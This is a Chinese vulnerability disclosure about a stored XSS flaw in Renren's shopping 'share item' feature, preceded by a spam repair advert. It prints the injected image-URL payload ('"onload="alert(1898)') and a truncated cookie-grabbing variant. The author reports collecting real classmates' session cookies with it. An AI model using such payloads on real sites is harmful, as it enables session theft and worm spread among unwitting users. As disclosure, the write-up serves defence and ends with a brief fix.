沈阳电脑维修上门服务13889116605： 人人网XSS造成强力蠕虫，这回不跨GG了，只要加我好友，一开人人就中招。这要是传播起来--杠杠的。首先上图吧，最严重的两个这是在人人网个人首页中，还有一个是在人人逛街的首页中--如果我... 人人网XSS造成强力蠕虫，这回不跨GG了，只要加我好友，一开人人就中招。这要是传播起来--杠杠的。 首先上图吧，最严重的两个   这是在人人网个人首页中， 还有一个是在人人逛街的首页中--如果我的推荐出现在了主页中，在这个时候进入人人逛街主页的人全都会被蠕虫攻击。 还有两处 在个人主页以及个人专辑中、在推荐详情中：     看到这里估计已经知道出事地点是哪了。就是人人逛街的“分享宝贝”。 下面是实现过程： 首先“分享宝贝”到淘宝上随便选一个宝贝分享过来     通过验证后     在点发布前对包进行拦截，可以看到这样一个包     其中的pics中有四张图片： http%3A%2F%2Ffmn.rrimg.com%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Flarge_x9G9_29d50000ad81118d.jpg"onload="alert(1898)"%3Ft%3Dlarge%26w%3D450%26h%3D450%2Chttp%3A%2F%2Ffmn.rrimg.com%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Fmain1_x9G9_29d50000ad81118d.jpg"onload="alert(1898)"%3Ft%3Dmain1%26w%3D320%26h%3D320%2Chttp%3A%2F%2Ffmn.rrimg.com%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Fmain2_x9G9_29d50000ad81118d.jpg"onload="alert(1898)"%3Ft%3Dmain2%26w%3D210%26h%3D210%2Chttp%3A%2F%2Ffmn.rrimg.com%2Ffmn065%2Fgouwu%2F20120831%2F0320%2Fhead_x9G9_29d50000ad81118d.jpg"onload="alert(1898)"%3Ft%3Dhead%26w%3D100%26h%3D100 在每张图片末尾都加上"onload="alert(1898)" 然后就不论是在小图中图大图中，，都能被跨到了-- 为了进一步测试威力我将代码换成了：www.it165.net   "onload="document.write( 然后等了40分钟 一共有我7位可爱的同学将他们的COOKIE传给了我==     (duapp因为设置了啥映射，所以只能获取到本地IP==) 可见在人人主页跨起来还是很给力的--。。。 我一分享新东西就帮我在主页发出去了-- 我觉得我就不用吧蠕虫代码贴出来了--，到这里危害已经很明显了-- 求给力啊。   修复方案： 问题很多，不止我提交的这一个，不过大部分都差不多，过滤干净就行。
上一篇:PHP引号致IE XSS Filter bypass的解决方案